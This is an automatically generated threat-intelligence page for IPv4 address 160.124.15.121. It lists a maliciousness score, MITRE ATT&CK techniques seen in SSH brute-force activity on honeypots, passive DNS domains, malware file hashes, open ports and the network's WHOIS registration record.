160.124.15.121 Threat Intelligence and Host Information

Share on:
Apr 07, 2024 ipinfopage

General

This page contains threat intelligence information for the IPv4 address 160.124.15.121 and was generated either as a result of observed malicious activity or as an information gathering exercise to assist with enrichment of security events and context. All information is gathered passively through aggregation of public sources, or observations through activity upon honeynets. The host score is calculated through a series of statistically weighted values and machine learning which takes into account metadata such as host information, frequency, volume and global distribution of malicious activity, association with other known malicious hosts or networks, proxying or anonymising behaviour such as with tor exit nodes, residential proxies or VPN services, and many other attributes. These values are historical and indicative only - and should not be taken to be an accurate representation of the users, businesses or networks in which they reside.

Likely Malicious Host 🟠 60/100

Host and Network Information

  • Mitre ATT&CK IDs: T1078 - Valid Accounts, T1083 - File and Directory Discovery, T1098.004 - SSH Authorized Keys, T1105 - Ingress Tool Transfer, T1110.004 - Credential Stuffing, T1110 - Brute Force

  • Tags: cowrie, cyber security, ioc, malicious, Nextray, phishing, ssh

  • View other sources: Spamhaus VirusTotal

  • Country: South Africa
  • Network: AS132839 power line datacenter
  • Noticed: 30 times
  • Protocols Attacked: SSH
  • Countries Attacked: Canada, Czechia, Denmark, Estonia, France, Germany, Latvia, Lithuania, Norway, Poland, Romania, Turkey, Ukraine, United Kingdom of Great Britain and Northern Ireland, United States of America
  • Passive DNS Results: arnoldschwarzeneggerpdfdrive.com immuneplant.com 180remodeling.com 9cma2q.com zhongketest.com landroversouth.com pythonlib.cn

Malware Detected on Host

Count: 6 b9df41c142b326c475607b3044c4e46835254fdae899f3d28b9829e4ebc41212 0e0897781e3ca4773de29d36101ea7c9360b67f461617afa50d19b76254d6bd1 578d15c10a6df0cbe9d93e54d1bb0b4ff415196363279c5fac6971e908b39ef3 efca6b2dafcdb637761cdff09a3b3e4dcafc5de37340269521f2f6efc72fa6d2 3cc4f508e06647c98d38ab24eff9de3fd27acd91f42ca9ff76b381cee1a942c1 331abe9b8b35cdb3d38eeb1349e18a13aff1b92e93f03f9cb7f28dd679972c61

Open Ports Detected

5985 80 8081

Map

Whois Information

  • inetnum: 160.124.0.0 - 160.124.255.255
  • netname: POSIX-AFRICA
  • descr: Posix Systems (Pty) Ltd
  • descr: P.O. Box 73892
  • descr: Lynnwood Ridge, 0040
  • country: ZA
  • org: ORG-PS1-AFRINIC
  • admin-c: MJE-AFRINIC
  • tech-c: MJE-AFRINIC
  • status: ASSIGNED PI
  • mnt-by: AFRINIC-HM-MNT
  • mnt-lower: POSIX-MNT
  • mnt-domains: POSIX-MNT
  • mnt-routes: POSIX-MNT
  • parent: 0.0.0.0 - 255.255.255.255
  • organisation: ORG-PS1-AFRINIC
  • org-name: Posix Systems (Pty) Ltd
  • org-type: EU-PI
  • country: ZA
  • address: P.O. Box 73892
  • address: Lynnwood Ridge 0040
  • phone: tel:+27-82-601-0496
  • phone: tel:+27-12-807-0590
  • admin-c: MJE-AFRINIC
  • admin-c: AEP-AFRINIC
  • tech-c: MJE-AFRINIC
  • tech-c: AEP-AFRINIC
  • mnt-ref: AFRINIC-HM-MNT
  • mnt-ref: POSIX-MNT
  • mnt-by: AFRINIC-HM-MNT
  • person: Mark Elkins
  • nic-hdl: MJE-AFRINIC
  • address: Posix Systems (Pty) Ltd
  • address: P O Box 73892
  • address: Gauteng
  • address: Lynnwood Ridge 0040
  • address: South Africa
  • phone: tel:+27-82-601-0496
  • org: org-ps1-afrinic
  • mnt-by: POSIX-MNT
  • route: 160.124.0.0/16
  • descr: Posix Systems, South Africa
  • origin: AS6083
  • mnt-by: POSIX-MNT

Links to attack logs

** ** ** bruteforce-ip-list-2021-04-01